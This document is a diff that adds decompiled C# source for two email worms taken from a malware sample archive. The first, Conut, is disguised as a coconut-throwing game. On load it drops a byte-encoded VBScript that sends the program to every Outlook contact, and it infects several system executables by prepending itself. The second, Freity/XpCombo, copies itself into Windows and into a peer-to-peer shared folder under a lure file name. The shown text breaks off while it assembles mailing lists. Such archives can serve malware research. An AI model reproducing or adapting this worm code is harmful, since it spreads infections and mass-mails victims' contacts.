@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>coconut</AssemblyName>
<ApplicationVersion>1.0.1289.25246</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="coconut\Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="coconut\Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/Email-Worm.Win32.Conut.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "coconut", "Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.csproj", "{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000005\u002D1 \u0024\u0024method0x6000005\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 685, Pack = 1)]
private struct \u0024\u0024struct0x6000005\u002D1
{
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/coconut/Form1.cs
+947
View File
@@ -0,0 +1,947 @@
// Decompiled with JetBrains decompiler
// Type: coconut.Form1
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Resources;
using System.Windows.Forms;
namespace coconut
{
public class Form1 : Form
{
public int throw_turn = 0;
public int score = 0;
public Random rand_numb = new Random();
public string virname = Application.ExecutablePath;
private Button button1;
private PictureBox coco;
private PictureBox cluley;
private PictureBox redattack;
private PictureBox cl_coco;
private PictureBox red_coco;
private PictureBox ms_coco;
private Label label1;
private Label label2;
private Container components = (Container) null;
public Form1() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (Form1));
this.coco = new PictureBox();
this.cluley = new PictureBox();
this.redattack = new PictureBox();
this.button1 = new Button();
this.cl_coco = new PictureBox();
this.red_coco = new PictureBox();
this.ms_coco = new PictureBox();
this.label1 = new Label();
this.label2 = new Label();
this.SuspendLayout();
this.coco.BackColor = Color.White;
this.coco.Image = (Image) resourceManager.GetObject("coco.Image");
this.coco.Location = new Point(0, 88);
this.coco.Name = "coco";
this.coco.Size = new Size(104, 96);
this.coco.TabIndex = 0;
this.coco.TabStop = false;
this.cluley.Image = (Image) resourceManager.GetObject("cluley.Image");
this.cluley.Location = new Point(352, 176);
this.cluley.Name = "cluley";
this.cluley.Size = new Size(80, 104);
this.cluley.TabIndex = 1;
this.cluley.TabStop = false;
this.redattack.Image = (Image) resourceManager.GetObject("redattack.Image");
this.redattack.Location = new Point(176, 176);
this.redattack.Name = "redattack";
this.redattack.Size = new Size(104, 104);
this.redattack.TabIndex = 2;
this.redattack.TabStop = false;
this.button1.BackColor = Color.LightGray;
this.button1.Location = new Point(208, 40);
this.button1.Name = "button1";
this.button1.Size = new Size(168, 48);
this.button1.TabIndex = 3;
this.button1.Text = "Throw!";
this.button1.Click += new EventHandler(this.button1_Click);
this.cl_coco.BackColor = Color.White;
this.cl_coco.Image = (Image) resourceManager.GetObject("cl_coco.Image");
this.cl_coco.Location = new Point(336, 176);
this.cl_coco.Name = "cl_coco";
this.cl_coco.Size = new Size(104, 96);
this.cl_coco.TabIndex = 4;
this.cl_coco.TabStop = false;
this.cl_coco.Visible = false;
this.red_coco.BackColor = Color.White;
this.red_coco.Image = (Image) resourceManager.GetObject("red_coco.Image");
this.red_coco.Location = new Point(176, 176);
this.red_coco.Name = "red_coco";
this.red_coco.Size = new Size(104, 96);
this.red_coco.TabIndex = 5;
this.red_coco.TabStop = false;
this.red_coco.Visible = false;
this.ms_coco.BackColor = Color.White;
this.ms_coco.Image = (Image) resourceManager.GetObject("ms_coco.Image");
this.ms_coco.Location = new Point(496, 176);
this.ms_coco.Name = "ms_coco";
this.ms_coco.Size = new Size(104, 96);
this.ms_coco.TabIndex = 6;
this.ms_coco.TabStop = false;
this.ms_coco.Visible = false;
this.label1.Location = new Point(136, 144);
this.label1.Name = "label1";
this.label1.Size = new Size(184, 24);
this.label1.TabIndex = 7;
this.label1.Text = "Frans Devaere aka \"ReDaTtAcK\"";
this.label2.Location = new Point(352, 144);
this.label2.Name = "label2";
this.label2.TabIndex = 8;
this.label2.Text = "Graham Cluley";
this.AutoScaleBaseSize = new Size(5, 13);
this.BackColor = Color.White;
this.ClientSize = new Size(600, 270);
this.Controls.AddRange(new Control[9]
{
(Control) this.label2,
(Control) this.label1,
(Control) this.ms_coco,
(Control) this.red_coco,
(Control) this.cl_coco,
(Control) this.button1,
(Control) this.redattack,
(Control) this.cluley,
(Control) this.coco
});
this.Name = nameof (Form1);
this.Text = "The Coconut Game";
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
private void Form1_Load(object sender, EventArgs e)
{
byte[] buffer1 = new byte[685]
{
(byte) 79,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 114,
(byte) 114,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 82,
(byte) 101,
(byte) 115,
(byte) 117,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 68,
(byte) 105,
(byte) 109,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 44,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 44,
(byte) 32,
(byte) 65,
(byte) 44,
(byte) 32,
(byte) 66,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 44,
(byte) 32,
(byte) 68,
(byte) 44,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 111,
(byte) 117,
(byte) 116,
(byte) 108,
(byte) 111,
(byte) 111,
(byte) 107,
(byte) 46,
(byte) 97,
(byte) 112,
(byte) 112,
(byte) 108,
(byte) 105,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 71,
(byte) 101,
(byte) 116,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 83,
(byte) 112,
(byte) 97,
(byte) 99,
(byte) 101,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 77,
(byte) 65,
(byte) 80,
(byte) 73,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 65,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 66,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 65,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 73,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 32,
(byte) 40,
(byte) 48,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 68,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 66,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 69,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 66,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 82,
(byte) 101,
(byte) 99,
(byte) 105,
(byte) 112,
(byte) 105,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 43,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 73,
(byte) 102,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 62,
(byte) 32,
(byte) 51,
(byte) 48,
(byte) 48,
(byte) 48,
(byte) 32,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 120,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 71,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 66,
(byte) 111,
(byte) 100,
(byte) 121,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 105,
(byte) 115,
(byte) 32,
(byte) 103,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 97,
(byte) 100,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 102,
(byte) 101,
(byte) 101,
(byte) 108,
(byte) 32,
(byte) 108,
(byte) 105,
(byte) 107,
(byte) 101,
(byte) 32,
(byte) 73,
(byte) 32,
(byte) 119,
(byte) 97,
(byte) 115,
(byte) 32,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 97,
(byte) 32,
(byte) 118,
(byte) 97,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 58,
(byte) 41,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 65,
(byte) 116,
(byte) 116,
(byte) 97,
(byte) 99,
(byte) 104,
(byte) 109,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 34,
(byte) 99,
(byte) 58,
(byte) 92,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 101,
(byte) 120,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 65,
(byte) 102,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 109,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 84,
(byte) 114,
(byte) 117,
(byte) 101,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 101,
(byte) 110,
(byte) 100,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 105,
(byte) 110,
(byte) 103,
(byte) 46,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 83,
(byte) 121,
(byte) 115,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 32,
(byte) 87,
(byte) 115,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 46,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 70,
(byte) 117,
(byte) 108,
(byte) 108,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101
};
FileStream fileStream1 = new FileStream("c:\\mail.vbs", FileMode.OpenOrCreate, FileAccess.Write);
fileStream1.Write(buffer1, 0, buffer1.Length);
fileStream1.Close();
if (!File.Exists("c:\\coconut.exe"))
{
Process process = new Process();
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream2 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream3 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer2 = new byte[200704];
fileStream2.Read(buffer2, 0, 200704);
fileStream3.Write(buffer2, 0, 200704);
fileStream2.Close();
fileStream3.Close();
File.Delete("c:\\tmpvir.exe");
process.StartInfo.FileName = "c:\\mail.vbs";
process.Start();
}
else
{
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream4 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream5 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer3 = new byte[200704];
fileStream4.Read(buffer3, 0, 200704);
fileStream5.Write(buffer3, 0, 200704);
fileStream4.Close();
fileStream5.Close();
File.Delete("c:\\tmpvir.exe");
}
}
private void button1_Click(object sender, EventArgs e)
{
int num1 = this.rand_numb.Next(3);
++this.throw_turn;
this.coco.Visible = false;
switch (num1)
{
case 0:
this.ms_coco.Visible = true;
int num2 = (int) MessageBox.Show("You missed! You earned 0 points.");
this.ms_coco.Visible = false;
break;
case 1:
this.red_coco.Visible = true;
int num3 = (int) MessageBox.Show("You hit Frans Devaere! You earned 1 point.");
this.red_coco.Visible = false;
++this.score;
break;
default:
this.cl_coco.Visible = true;
int num4 = (int) MessageBox.Show("You hit Graham Cluley! You earned 2 points.");
this.cl_coco.Visible = false;
this.score += 2;
break;
}
this.coco.Visible = true;
if (this.throw_turn != 3)
return;
this.FileSearch(new DirectoryInfo(Environment.SystemDirectory).Parent.FullName);
int num5 = (int) MessageBox.Show("In total, you have " + (object) this.score + " point(s). Therefore, I have infected " + (object) (6 - this.score) + " files on your computer. To be able to run these files, you'll first have to play this game again.\nHave a nice day, \n\nGigabyte [Metaphase VX Team]");
FileStream fileStream1 = new FileStream(this.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 200704))];
fileStream1.Seek(200704L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 200704);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 200704);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !this.virname.EndsWith("coconut.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
Application.Exit();
}
private void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int num1 = this.rand_numb.Next(files.Length - 6);
for (int index = num1; index < num1 + (6 - this.score); ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num2 = fileStream1.ReadByte();
fileStream1.Close();
if (num2 != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy("c:\\coconut.exe", str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
}
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/coconut/Form1.resx
+141
View File
File diff suppressed because one or more lines are too long
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Email-Worm.Win32.Freity.csproj
+39
View File
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>XpCombo</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Email-Worm.Win32.Freity.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XpCombo", "Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.csproj", "{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Module1.cs
+265
View File
@@ -0,0 +1,265 @@
// Decompiled with JetBrains decompiler
// Type: Module1
// Assembly: XpCombo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 3FCA07A7-B1C6-4879-B2D5-DAEB4F710028
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Reflection;
[StandardModule]
internal sealed class Module1
{
private static string filnam = "xpc1";
private static string v = " ";
private static string i;
private static string p;
private static string u;
private static int t = 1;
private static string o;
private static string k = ".vbs";
private static int l = 0;
private static string m;
private static string[] a = new string[11];
private static string[] b = new string[11];
private static string c;
private static string[] d = new string[51];
private static string[] e = new string[6];
private static string[] h = new string[69];
private static string[] f = new string[4];
private static string[] g = new string[4];
private static string q;
private static string x;
private static string y;
private static string z;
private static string r;
private static Module xp = Assembly.GetExecutingAssembly().GetModules()[0];
[STAThread]
public static void main()
{
Module1.i = "Owner";
Module1.o = Environment.UserName;
if (StringType.StrCmp(Module1.o, Module1.i, false) == 0 | File.Exists("C:\\windows\\fr8i.exe"))
{
int num = (int) Interaction.MsgBox((object) "You have been infected by XpCombo Worm Created By LoTti");
Module1.full();
}
else
{
FileSystem.FileCopy(Module1.xp.FullyQualifiedName, "" + Module1.filnam);
FileSystem.FileCopy(Module1.filnam, "C:\\Windows\\fr8i.exe");
if (StringType.StrCmp(FileSystem.Dir("c:\\program files\\BearShare\\my shared folder", FileAttribute.Directory), "", false) == 0)
FileSystem.MkDir("c:\\program files\\BearShare\\my shared folder");
FileSystem.FileCopy(Module1.filnam, "C:\\Program Files\\BearShare\\my shared folder\\Angelina Jolie.scr");
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
Module1.d[0] = "\"joan";
Module1.d[1] = "\"michelle";
Module1.d[2] = "\"brian";
Module1.d[3] = "\"sinead";
